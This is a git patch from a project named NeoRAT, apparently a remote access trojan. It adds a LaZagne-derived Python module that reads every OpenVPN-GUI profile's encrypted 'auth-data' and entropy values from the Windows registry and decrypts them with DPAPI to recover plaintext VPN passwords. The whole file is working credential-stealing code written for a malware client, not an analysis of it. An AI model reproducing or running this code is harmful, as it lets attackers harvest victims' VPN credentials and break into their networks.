From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL <alvin@alvinhavel.com>
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 .../lazagne/softwares/sysadmin/openvpn.py          | 55 ++++++++++++++++++++++
 1 file changed, 55 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/sysadmin/openvpn.py

(limited to 'foreign/client_handling/lazagne/softwares/sysadmin/openvpn.py')

diff --git a/foreign/client_handling/lazagne/softwares/sysadmin/openvpn.py b/foreign/client_handling/lazagne/softwares/sysadmin/openvpn.py
new file mode 100644
index 0000000..9495cbd
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/sysadmin/openvpn.py
@@ -0,0 +1,55 @@
+try:
+    import _winreg as winreg
+except ImportError:
+    import winreg
+
+from foreign.client_handling.lazagne.config.winstructure import *
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import Win32CryptUnprotectData
+from foreign.client_handling.lazagne.config.constant import constant
+
+
+class OpenVPN(ModuleInfo):
+    def __init__(self):
+        ModuleInfo.__init__(self, name='openvpn', category='sysadmin', registry_used=True, winapi_used=True)
+
+    def check_openvpn_installed(self):
+        try:
+            key = OpenKey(HKEY_CURRENT_USER, 'Software\\OpenVPN-GUI\\Configs')
+            return key
+        except Exception as e:
+            self.debug(str(e))
+            return False
+
+    def decrypt_password(self, encrypted_password, entropy):
+        return Win32CryptUnprotectData(encrypted_password,
+                                       entropy=entropy,
+                                       is_current_user=constant.is_current_user,
+                                       user_dpapi=constant.user_dpapi)
+
+    def get_credentials(self, key):
+        pwd_found = []
+        num_profiles = winreg.QueryInfoKey(key)[0]
+        for n in range(num_profiles):
+            name_skey = winreg.EnumKey(key, n)
+            skey = OpenKey(key, name_skey)
+            values = {'Profile': name_skey}
+            try:
+                encrypted_password = winreg.QueryValueEx(skey, "auth-data")[0]
+                entropy = winreg.QueryValueEx(skey, "entropy")[0][:-1]
+                password = self.decrypt_password(encrypted_password, entropy)
+                values['Password'] = password.decode('utf16')
+            except Exception as e:
+                self.debug(str(e))
+            pwd_found.append(values)
+            winreg.CloseKey(skey)
+        winreg.CloseKey(key)
+
+        return pwd_found
+
+    def run(self):
+        openvpn_key = self.check_openvpn_installed()
+        if openvpn_key:
+            results = self.get_credentials(openvpn_key)
+            if results:
+                return results
-- 
cgit v1.2.3